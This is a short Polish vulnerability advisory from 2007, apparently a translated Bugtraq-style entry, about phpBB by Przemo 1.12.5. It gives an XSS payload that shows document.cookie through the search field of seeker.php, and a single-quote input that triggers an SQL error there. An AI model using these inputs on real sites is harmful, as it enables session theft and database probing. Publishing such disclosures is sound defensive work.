|
Polskie tłumaczenie bugtraqu
| Przetłumaczył: | vizzdoom | | Temat artykułu: | phpBB by Przemo XSS / błąd SQL | | Źródło: | vizzdoom :) | | Podatne wersje: | 1.12.5 | | Data publikacji: | 2007-10-21 12:28:56 | | Czytano: | 8917 razy |
Niefiltrowane zmienne w pliku:
seeker.php
XSS
w $_POST['query'] albo po prostu w polu szukaj wpisujemy:
"><script>alert(document.cookie);</script>
Ciekawostka. Błąd SQL zostanie wyświetlony jeśli np w:
$_POST['lookfor'] wpiszemy :
username' |
|
|
